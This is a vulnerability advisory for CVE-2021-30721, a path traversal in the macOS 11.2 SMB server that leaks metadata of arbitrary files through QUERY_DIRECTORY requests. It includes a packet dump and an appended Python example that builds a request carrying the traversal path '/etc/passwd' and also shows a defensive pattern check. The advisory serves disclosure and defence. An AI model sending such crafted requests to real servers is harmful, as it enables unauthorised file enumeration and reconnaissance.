CVE-2021-30721
An arbitrary file access vulnerability exists in the SMB server of Apple macOS 11.2. A specially crafted SMB request can leak metadata of arbitrary files. An attacker can trigger this vulnerability by sending a malicious packet to the vulnerable server.
Apple macOS 11.2
4.3 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
CWE-22 - Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
macOS is a series of proprietary operating systems developed by Apple; at the time of this advisory, macOS 11.2 (Big Sur) was the latest release.
Server Message Block (SMB) is a network file sharing protocol widely used in Windows network environments and macOS contains a proprietary implementation of both server and client components. SMB is often used in office and enterprise environments for file and printer sharing.
Three distinct versions and multiple dialects of the SMB protocol are supported by macOS' SMB server. This vulnerability is present in SMB2 and newer versions of the protocol, more specifically in the QUERY_DIRECTORY processing, which is used to enumerate directory information and contents. The protocol specification shows that the QUERY_DIRECTORY request structure contains a Unicode buffer that represents a search string to be run on the queried directory. This search string is meant to contain a file name or a wildcard pattern to filter the results of the query.
Normally, an authenticated user is only permitted to access and query directories and files that fall under the share being accessed. A file open request on a file outside the share, for example, fails with an insufficient access rights error, since proper checks are made on that path. When a QUERY_DIRECTORY request is processed in smb2_dispatch_query_directory, the function darwin::darwin_directory::query_directory is called, which treats the input string in one of two ways. First, if the query string contains special characters, it is treated as a special regex and the function iterates over the matching results, passing each to darwin::query_relative_name. Second, if no special characters are present, the query string is passed to darwin::query_relative_name almost directly. The vulnerability lies in the fact that the query string can contain a regular UNIX path that begins with /, which allows an attacker to access any file on the file system, presuming the underlying user has the access rights to it. Metadata about the file or directory is returned to the user, which can include access timestamps, sizes and other information. The following example shows a QUERY_DIRECTORY response that reveals metadata of /etc/passwd:
Find Response (0x0e)
    [Info Level: SMB2_FIND_ID_FULL_DIRECTORY_INFO (38)]
    StructureSize: 0x0009
    Blob Offset: 0x00000048
    Blob Length: 102
    Info: 000000000000000000c316529052d601dc01e99d3a77d601…
    FileIdBothDirectoryInfo: /etc/passwd
        Next Offset: 0
        File Index: 0x00000000
        Create: Jul 4, 2020 22:51:26.000000000 PDT
        Last Access: Aug 20, 2020 14:41:09.511010800 PDT
        Last Write: Jul 4, 2020 22:51:26.000000000 PDT
        Last Change: Aug 20, 2020 14:41:09.512743300 PDT
        End Of File: 6946
        Allocation Size: 8192
        File Attributes: 0x00000020
        Filename Length: 22
        EA Size: 0
        Reserved: 00000000
        File Id: 0x000000030004305a
        Filename: /etc/passwd
Additionally, if the file or directory does not exist, an error is sent in reply. This can be used to enumerate existing files and directories, especially user home directories, which reveals usernames that could be useful in further attacks.
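As an added example (not code from this advisory, from Cisco Talos or from Apple), the following Python builds the QUERY_DIRECTORY request body described above with an absolute UNIX path in its FileName buffer, shows the kind of search-pattern check a server should apply before resolving that string relative to the opened directory (an illustration of the missing check, not Apple's actual fix), and parses a constructed response carrying the FileIdFullDirectoryInformation entry from the dump above. The wire layouts follow MS-SMB2 2.2.33/2.2.34 and MS-FSCC; the function names, the all-zero directory file ID and the sample bytes (timestamps converted from the PDT values in the dump to UTC) are assumptions made for this example.

```python
"""Added example: SMB2 QUERY_DIRECTORY request, search-pattern check and
FileIdFullDirectoryInformation parser. All bytes are constructed locally;
nothing here talks to a real server."""
import struct
from datetime import datetime, timedelta, timezone

SMB2_HEADER_LEN = 64                        # request/response body follows a 64-byte SMB2 header
FILE_ID_FULL_DIRECTORY_INFORMATION = 0x26   # info level 38 shown in the dump
SMB2_RESTART_SCANS = 0x01

QDIR_REQ = struct.Struct("<HBBI16sHHI")              # 32-byte fixed part of the request
QDIR_RESP = struct.Struct("<HHI")                    # StructureSize, OutputBufferOffset, OutputBufferLength
FID_FULL_DIR_INFO = struct.Struct("<IIQQQQQQIIIIQ")  # 80-byte fixed part of one entry

EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)


def datetime_to_filetime(dt):
    """Aware datetime -> Windows FILETIME (100 ns ticks since 1601-01-01 UTC)."""
    d = dt - EPOCH_1601
    return (d.days * 86400 + d.seconds) * 10_000_000 + d.microseconds * 10


def filetime_to_datetime(ft):
    """Windows FILETIME -> aware datetime (truncated to microseconds)."""
    return EPOCH_1601 + timedelta(microseconds=ft // 10)


def is_safe_search_pattern(pattern):
    """Illustrative server-side check (hypothetical, not Apple's fix): the search
    string must name a single entry or wildcard inside the opened directory.
    Anything containing a path separator, a NUL or a traversal component is
    refused, which covers the absolute path ('/etc/passwd') this advisory describes."""
    if not pattern or pattern == "..":
        return False
    return not any(c in pattern for c in "/\\\x00")


def build_query_directory(file_id, pattern,
                          info_class=FILE_ID_FULL_DIRECTORY_INFORMATION,
                          output_len=0x10000):
    """Encode the SMB2 QUERY_DIRECTORY request body for the open directory
    handle `file_id` (16-byte SMB2_FILEID). `pattern` is copied into the
    UTF-16LE FileName buffer unchanged, so '/etc/passwd' goes out verbatim."""
    name = pattern.encode("utf-16-le")
    fixed = QDIR_REQ.pack(33, info_class, SMB2_RESTART_SCANS, 0, file_id,
                          SMB2_HEADER_LEN + QDIR_REQ.size, len(name), output_len)
    return fixed + name


def encode_dir_entry(name, create, access, write, change, end_of_file,
                     alloc_size, attrs, file_id, next_offset=0):
    """One FileIdFullDirectoryInformation entry: 80 fixed bytes + UTF-16LE name."""
    name_bytes = name.encode("utf-16-le")
    return FID_FULL_DIR_INFO.pack(next_offset, 0, create, access, write, change,
                                  end_of_file, alloc_size, attrs,
                                  len(name_bytes), 0, 0, file_id) + name_bytes


def parse_query_directory_response(body):
    """Decode a QUERY_DIRECTORY response body (everything after the SMB2 header)
    into a list of entry dicts, following NextEntryOffset until it is 0."""
    size, out_off, out_len = QDIR_RESP.unpack_from(body, 0)
    if size != 9:
        raise ValueError("unexpected StructureSize %d" % size)
    start = out_off - SMB2_HEADER_LEN
    blob = body[start:start + out_len]
    entries, off = [], 0
    while True:
        (next_off, _idx, create, access, write, change, eof, alloc, attrs,
         name_len, ea_size, _rsvd, fid) = FID_FULL_DIR_INFO.unpack_from(blob, off)
        name_start = off + FID_FULL_DIR_INFO.size
        entries.append({
            "name": blob[name_start:name_start + name_len].decode("utf-16-le"),
            "create": filetime_to_datetime(create),
            "last_access": filetime_to_datetime(access),
            "last_write": filetime_to_datetime(write),
            "change": filetime_to_datetime(change),
            "end_of_file": eof, "allocation_size": alloc,
            "attributes": attrs, "ea_size": ea_size, "file_id": fid,
        })
        if next_off == 0:
            return entries
        off += next_off


def sample_response():
    """Constructed response mirroring the dump above: one entry for /etc/passwd,
    blob at offset 0x48 (64-byte header + 8-byte fixed response part)."""
    created = datetime_to_filetime(datetime(2020, 7, 5, 5, 51, 26, tzinfo=timezone.utc))
    accessed = datetime_to_filetime(datetime(2020, 8, 20, 21, 41, 9, 511010, tzinfo=timezone.utc))
    entry = encode_dir_entry("/etc/passwd", created, accessed, created, accessed,
                             end_of_file=6946, alloc_size=8192, attrs=0x20,
                             file_id=0x000000030004305A)
    return QDIR_RESP.pack(9, SMB2_HEADER_LEN + QDIR_RESP.size, len(entry)) + entry


if __name__ == "__main__":
    req = build_query_directory(b"\x00" * 16, "/etc/passwd")  # all-zero FileId is a placeholder
    print("request body: %d bytes, safe pattern: %s" % (len(req), is_safe_search_pattern("/etc/passwd")))
    for e in parse_query_directory_response(sample_response()):
        print(e["name"], e["end_of_file"], e["create"].isoformat())
```

The constructed response encodes to 102 bytes of entry data, the same Blob Length the dump shows, because the 80-byte fixed part plus the 22-byte UTF-16LE name "/etc/passwd" is exactly what the server returned; a real client would take the 16-byte FileId from the CREATE response for the share's root directory rather than the placeholder used here.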
2021-03-15 - Vendor Disclosure
2021-05-25 - Vendor Patched
2021-06-02 - Public Release
Discovered by Aleksandar Nikolic of Cisco Talos.